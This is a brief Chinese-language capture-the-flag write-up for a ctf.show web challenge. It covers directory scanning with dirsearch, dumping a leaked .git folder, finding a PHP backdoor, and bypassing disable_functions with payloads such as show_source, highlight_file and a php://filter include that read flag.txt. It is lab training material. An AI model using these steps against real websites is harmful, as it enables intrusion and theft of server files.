打开题目首先看到的就是一个phpinfo(),找不到别的东西。
1、目录扫描
(不知道为什么我扫这一个就很慢,个/s,会疯)
dirsearch -u http://2f681fde-cc3c-455e-9a07-9161f6aca81b.challenge.ctf.show/ -e*
扫出来会发现很多.git,无疑就是存在git泄露
2、Git_Extract
(这里使用GitHack不好使,所有选择Git_Extract)
项目地址:Git_Extract
python2 git_extract.py https://ce1ab195-de72-4774-9abb-0ec653b27cb7.challenge.ctf.show/.git/
有后门文件。
由于disable_functions禁用了很多能执行系统命令的函数(system、passthru等),所有我们通过蚁剑连接上后门,只能看看目录结构,找到flag的位置,查看不了文件,打开命令行也不行
playload:
?Letmein=show_source("../flag.txt");
?Letmein=highlight_file("../flag.txt");
# 伪协议读取
?Letmein=include("php://filter/resource=../flag.txt");
转载请说明出处,谢谢